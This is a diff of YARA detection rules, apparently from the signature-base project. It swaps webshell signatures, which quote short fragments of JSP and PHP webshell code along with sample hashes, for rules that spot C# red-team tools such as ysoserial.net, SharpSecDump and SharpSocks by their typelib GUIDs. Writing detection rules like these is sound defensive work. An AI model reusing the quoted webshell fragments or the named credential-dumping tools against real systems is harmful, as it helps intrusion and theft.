 
 	strings:
-		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+		$typelibguid0lo = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Download
+rule SIGNATURE_BASE_HKTL_NET_GUID_Inferno : FILE
 {
 	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2088-L2107"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "af2d9832-c7f9-5879-a19b-a3c4d91b8b3f"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/LimerBoy/Inferno"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3430-L3443"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3605e1304fb314c13d6c94d6ac9337731c6ee4fef679444d599cb3ae29023b56"
-		score = 70
+		logic_hash = "6e286b28bdc490d16892926ba95227d39aebb151067896e740d497024c526c0e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
-		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+		$typelibguid0lo = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Itsec_Itsecteam_Shell_Jhn
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsearch : FILE
 {
 	meta:
-		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2108-L2125"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "459d8a34-f311-5459-8257-e7aa519174b5"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/SharpSearch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3445-L3458"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2775d7e47a26e06ea716bdca32a0f768eccf4d269caa3d107b4a78f8684ce741"
-		score = 70
+		logic_hash = "1a383fd8e4ec8fa9f1fbc01bdeb3d5b1e32ec825a24c1eaad6c42e86ac682530"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
-		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+		$typelibguid0lo = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Ghost_Source_Icesword_Silic
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsecdump : FILE
 {
 	meta:
-		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2126-L2143"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "492dfb79-541a-589d-ac69-468e9b2ab9db"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/G0ldenGunSec/SharpSecDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3460-L3473"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "22879d5279866e3c25a5b41a98b44595f191cfcac6489208b0bdb6b7ca7201e5"
-		score = 70
+		logic_hash = "749130efbcdbd068bf4711cc5e4960eb97a3ae2ddadde2beb0ff707429495484"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
-		hash1 = "6e20b41c040efb453d57780025a292ae"
-		hash2 = "437d30c94f8eef92dc2f064de4998695"
 
 	strings:
-		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
-		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+		$typelibguid0lo = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Spy2009_M_Ma3_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Net_Gpppassword : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2144-L2187"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a718f9fc-acf5-536e-81d6-d393cebe8f77"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/outflanknl/Net-GPPPassword"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3475-L3488"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c61e5ccd4800f0cfd20532ab43f917f39a7367cc09cbe92e5320eb2c97fabf3"
-		score = 70
+		logic_hash = "46ae3156e5428c40278b124b7206b68922f955a297077df3288722c154d09fba"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash8 = "d71716df5042880ef84427acee8b121e"
-		hash9 = "341298482cf90febebb8616426080d1d"
-		hash10 = "29aebe333d6332f0ebc2258def94d57e"
-		hash11 = "42654af68e5d4ea217e6ece5389eb302"
-		hash12 = "88fc87e7c58249a398efd5ceae636073"
-		hash13 = "4a812678308475c64132a9b56254edbc"
-		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash15 = "344f9073576a066142b2023629539ebd"
-		hash16 = "32dea47d9c13f9000c4c807561341bee"
-		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash18 = "655722eaa6c646437c8ae93daac46ae0"
-		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash20 = "9c94637f76e68487fa33f7b0030dd932"
-		hash21 = "6acc82544be056580c3a1caaa4999956"
-		hash22 = "6aa32a6392840e161a018f3907a86968"
-		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash24 = "3ea688e3439a1f56b16694667938316d"
-		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash26 = "71097537a91fac6b01f46f66ee2d7749"
-		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
-		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+		$typelibguid0lo = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Job_Ma1_Ma4_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Filesearcher : FILE
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2188-L2208"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1b5f1f68-f87b-5e60-94a4-e2556b4e6c5d"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/NVISO-BE/FileSearcher"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3490-L3503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db76ff42079b20d9e5c40661d7b30206e6bffc828f55daa4dc210662068f8e27"
-		score = 70
+		logic_hash = "b72d3a7104ca7718d3d490149483a5d2d30790fb6d2b00b10c69da43c491e577"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
-		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+		$typelibguid0lo = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adfsdump : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2209-L2255"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8cb2edcd-3696-5857-90ca-e99b1af54320"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/fireeye/ADFSDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3505-L3518"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cda47d7967b0f4b2a274ff2196d27d2e108b00917812093bbb3f033a8a1d1c3c"
-		score = 70
+		logic_hash = "3735495d2c3a0b6f9de278014d5450f3d2e78dda9c04ede614550c75a05b43d2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "9c94637f76e68487fa33f7b0030dd932"
-		hash23 = "6acc82544be056580c3a1caaa4999956"
-		hash24 = "6aa32a6392840e161a018f3907a86968"
-		hash25 = "591ca89a25f06cf01e4345f98a22845c"
-		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash27 = "3ea688e3439a1f56b16694667938316d"
-		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash29 = "71097537a91fac6b01f46f66ee2d7749"
-		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
-		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+		$typelibguid0lo = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Wso2_5_1_Wso2_5_Wso2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprdp : FILE
 {
 	meta:
-		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2256-L2273"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d316ec0b-0313-52bb-923d-512fa08112f9"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xthirteen/SharpRDP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3520-L3533"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2dce52f1b8d2c33cd8478a468383a87f13712dc6e5c9050fea6ede4f0d24cc5"
-		score = 70
+		logic_hash = "96a5d82e8d03b6242d69cbd5bca2fcc3d4403e7a51099a37dcf9091a0bd53b6e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
-		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
-		hash2 = "cbc44fb78220958f81b739b493024688"
 
 	strings:
-		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
-		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+		$typelibguid0lo = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010_T00Ls
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcall : FILE
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2274-L2294"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "172415b6-0383-5da4-a88f-8ebe5daf9294"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/jhalon/SharpCall"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3535-L3548"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f507499304a7cf4d14a134a4c0781fed9a94c40fe3257a4168bacdf3910ffec"
-		score = 70
+		logic_hash = "4b4a8943e4fc07f41ce87d64266fd56af9912832b688f21769f4fe5a8152703b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
-		hash5 = "9c94637f76e68487fa33f7b0030dd932"
 
 	strings:
-		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
-		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+		$typelibguid0lo = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_Suiyue
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ysoserial_Net : FILE
 {
 	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2295-L2311"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "80483cd4-76e6-5629-bed7-4ae2e455222c"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/pwntester/ysoserial.net"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3550-L3564"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7f4ab5dbd2a72574c5d188e14ae98e599359b2d662266fc4c3a39d3d4405c208"
-		score = 70
+		logic_hash = "7d775864610e2e60faa3570746aa7a689bd719b02c3a47f43a2be097e4a81c5a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
 
 	strings:
-		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+		$typelibguid0lo = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii wide
+		$typelibguid1lo = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell_R57Shell127_Sniper_SA_Shell_Egy_Spider_Shell_V2_R57_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Managedinjection : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2312-L2337"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c66e7666-b54f-532d-90e1-870292047aec"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/malcomvetter/ManagedInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3566-L3581"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04a58352202538d5446f1000c07341ea70434f00403f116233f335213687636e"
-		score = 70
+		logic_hash = "eac722f30fea497f98d75293514e0f6f4dd17263c7377211605b1ab2f13ddf2f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef43fef943e9df90ddb6257950b3538f"
-		hash1 = "ae025c886fbe7f9ed159f49593674832"
-		hash2 = "911195a9b7c010f61b66439d9048f400"
-		hash3 = "697dae78c040150daff7db751fc0c03c"
-		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash8 = "41af6fd253648885c7ad2ed524e0692d"
-		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
-		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
-		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+		$typelibguid0lo = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii wide
+		$typelibguid1lo = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii wide
+		$typelibguid2lo = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_807_A_Css_Dm_He1P_Jspspy_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsocks : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2338-L2376"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "343061d9-e24e-5d49-939f-b94c295b17ac"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/nettitude/SharpSocks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3583-L3597"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb045425a9f519dd7bf028a7795b16b89768682f5850b6a4d45f0991bfeb6431"
-		score = 70
+		logic_hash = "477adf09ee9d04888ee5e352c11e95f855c433588771138ebb5970cae7aa044f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash5 = "d71716df5042880ef84427acee8b121e"
-		hash6 = "341298482cf90febebb8616426080d1d"
-		hash7 = "29aebe333d6332f0ebc2258def94d57e"
-		hash8 = "42654af68e5d4ea217e6ece5389eb302"
-		hash9 = "88fc87e7c58249a398efd5ceae636073"
-		hash10 = "4a812678308475c64132a9b56254edbc"
-		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash12 = "344f9073576a066142b2023629539ebd"
-		hash13 = "32dea47d9c13f9000c4c807561341bee"
-		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash15 = "6acc82544be056580c3a1caaa4999956"
-		hash16 = "6aa32a6392840e161a018f3907a86968"
-		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash18 = "3ea688e3439a1f56b16694667938316d"
-		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
